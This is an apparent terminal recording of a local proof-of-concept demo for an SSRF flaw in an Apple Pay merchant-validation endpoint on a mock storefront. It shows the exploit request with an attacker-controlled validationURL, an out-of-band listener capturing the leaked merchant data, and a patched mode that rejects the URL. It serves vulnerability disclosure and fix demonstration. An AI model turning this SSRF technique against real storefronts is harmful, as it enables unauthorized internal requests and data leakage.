{"version": 2, "width": 80, "height": 24, "timestamp": 1784050097, "idle_time_limit": 3.0, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}, "title": "Apple Pay ValidateMerchant SSRF — live PoC demo (vulnerable + fix)"}
[0.004083, "o", "\r\n"]
[0.004583, "o", "\u001b[1;36m>>> Apple Pay ValidateMerchant SSRF — live proof-of-concept demo\u001b[0m\r\n\r\n"]
[2.005351, "o", "\r\n\u001b[1;36m>>> SCENARIO 1: the VULNERABLE storefront  (the SSRF fires)\u001b[0m\r\n\r\n"]
[4.008673, "o", "########################################################################\r\n#  Apple Pay ValidateMerchant SSRF -- local demo   [mode: VULNERABLE]\r\n########################################################################\r\n\r\n[1/4] Starting OOB collaborator listener on :9000 ...\r\n"]
[4.008812, "o", "[2/4] Starting mock vulnerable storefront on :8080 ...\r\n"]
[4.035307, "o", "[collaborator] OOB listener on :9000  (logging to collaborator_hits.log)\r\n"]
[4.040426, "o", "[target] mock SFCC storefront listening on :8080  mode=VULNERABLE\r\n"]
[4.242333, "o", "      ...both listeners up.\r\n\r\n"]
[4.242395, "o", "[3/4] Firing the PoC script (poc/validate_merchant_ssrf.py) ...\r\n"]
[4.242411, "o", "----------------------------------------------------------------------\r\n"]
[4.273245, "o", "[!] Only proceed if you have explicit authorization for this target.\r\nType the target hostname to confirm (http://localhost:8080/en-us/cart): "]
[4.277328, "o", "[*] Establishing session via http://localhost:8080/en-us/cart\r\n"]
[4.278837, "o", "    [target] \"GET /en-us/cart HTTP/1.1\" 200 -\r\n"]
[4.279106, "o", "    -> HTTP 200\r\n[*] Sending validationURL='http://localhost:9000/poc' to http://localhost:8080/on/demandware.store/Sites-Demo-Site/en_US/__SYSTEM__ApplePay-ValidateMerchant\r\n"]
[4.279594, "o", "    [target] fetching attacker-supplied validationURL -> http://localhost:9000/poc\r\n"]
[4.284875, "o", "\r\n====================================================================\r\n  [!] OOB CALLBACK RECEIVED  2026-07-14T10:28:22.124\r\n====================================================================\r\n  POST /poc\r\n  From:  127.0.0.1:43988\r\n  Accept-Encoding: identity\r\n  Content-Length: 194\r\n  Host: localhost:9000\r\n  User-Agent: Python-urllib/3.13\r\n  Content-Type: application/json\r\n  Connection: close\r\n  ---- body (leaked by target backend) ----\r\n  {\"merchantIdentifier\": \"merchant.com.demo.storefront\", \"displayName\": \"Demo Storefront\", \"domainName\": \"demo-storefront.local\", \"initiative\": \"web\", \"initiativeContext\": \"demo-storefront.local\"}\r\n====================================================================\r\n"]
[4.285122, "o", "    [target] \"POST /on/demandware.store/Sites-Demo-Site/en_US/__SYSTEM__ApplePay-ValidateMerchant HTTP/1.1\" 500 -\r\n"]
[4.285396, "o", "    -> HTTP 500\r\n    -> body: {\"error\": \"Unknown error\"}\r\n\r\n[*] Now check your callback listener for an inbound HTTP request.\r\n    A generic error here is expected -- see docs/sequence-diagram.md.\r\n"]
[4.292014, "o", "----------------------------------------------------------------------\r\n\r\n"]
[4.793186, "o", "[4/4] What the OOB collaborator independently captured:\r\n"]
[4.794078, "o", "\r\n====================================================================\r\n  [!] OOB CALLBACK RECEIVED  2026-07-14T10:28:22.124\r\n====================================================================\r\n  POST /poc\r\n  From:  127.0.0.1:43988\r\n  Accept-Encoding: identity\r\n  Content-Length: 194\r\n  Host: localhost:9000\r\n  User-Agent: Python-urllib/3.13\r\n  Content-Type: application/json\r\n  Connection: close\r\n  ---- body (leaked by target backend) ----\r\n  {\"merchantIdentifier\": \"merchant.com.demo.storefront\", \"displayName\": \"Demo Storefront\", \"domainName\": \"demo-storefront.local\", \"initiative\": \"web\", \"initiativeContext\": \"demo-storefront.local\"}\r\n====================================================================\r\n"]
[4.794228, "o", "\r\n"]
[4.79424, "o", ">>> SSRF PROVEN: the storefront backend reached out to a host it should\r\n>>> never contact, and leaked the merchant identity payload in the body.\r\n"]
[4.794307, "o", "\r\n"]
[9.795765, "o", "\r\n\u001b[1;36m>>> SCENARIO 2: the PATCHED storefront  (validationURL rejected — no SSRF)\u001b[0m\r\n\r\n"]
[11.799118, "o", "########################################################################\r\n#  Apple Pay ValidateMerchant SSRF -- local demo   [mode: SECURE (patched)]\r\n########################################################################\r\n\r\n[1/4] Starting OOB collaborator listener on :9000 ...\r\n"]
[11.799253, "o", "[2/4] Starting mock vulnerable storefront on :8080 ...\r\n"]
[11.827675, "o", "[collaborator] OOB listener on :9000  (logging to collaborator_hits.log)\r\n"]
[11.831589, "o", "[target] mock SFCC storefront listening on :8080  mode=SECURE (patched)\r\n"]
[12.033701, "o", "      ...both listeners up.\r\n\r\n"]
[12.03378, "o", "[3/4] Firing the PoC script (poc/validate_merchant_ssrf.py) ...\r\n----------------------------------------------------------------------\r\n"]
[12.066146, "o", "[!] Only proceed if you have explicit authorization for this target.\r\nType the target hostname to confirm (http://localhost:8080/en-us/cart): "]
[12.070269, "o", "[*] Establishing session via http://localhost:8080/en-us/cart\r\n"]
[12.071773, "o", "    [target] \"GET /en-us/cart HTTP/1.1\" 200 -\r\n"]
[12.072159, "o", "    -> HTTP 200\r\n[*] Sending validationURL='http://localhost:9000/poc' to http://localhost:8080/on/demandware.store/Sites-Demo-Site/en_US/__SYSTEM__ApplePay-ValidateMerchant\r\n"]
[12.072701, "o", "    [target] SECURE: rejected non-Apple validationURL 'http://localhost:9000/poc' BEFORE any outbound call\r\n"]
[12.072736, "o", "    [target] \"POST /on/demandware.store/Sites-Demo-Site/en_US/__SYSTEM__ApplePay-ValidateMerchant HTTP/1.1\" 403 -\r\n"]
[12.072897, "o", "    -> HTTP 403\r\n    -> body: {\"error\": \"validationURL is not an Apple domain\"}\r\n\r\n[*] Now check your callback listener for an inbound HTTP request.\r\n"]
[12.072925, "o", "    A generic error here is expected -- see docs/sequence-diagram.md.\r\n"]
[12.079257, "o", "----------------------------------------------------------------------\r\n\r\n"]
[12.580477, "o", "[4/4] What the OOB collaborator independently captured:\r\n    (no callback received)\r\n"]
[12.580565, "o", ">>> EXPECTED IN SECURE MODE: validationURL was rejected before any\r\n>>> outbound call, so no SSRF occurred. This is the fix in action.\r\n\r\n"]
[17.581964, "o", "\r\n\u001b[1;36m>>> Recap: same PoC, same request. Vulnerable = secret leaked to our\u001b[0m\r\n\r\n\r\n\u001b[1;36m    collaborator. Patched = rejected before any outbound call. That's the bug,\u001b[0m\r\n\r\n"]
[17.582071, "o", "\r\n\u001b[1;36m    and that's the one-line fix.\u001b[0m\r\n\r\n"]
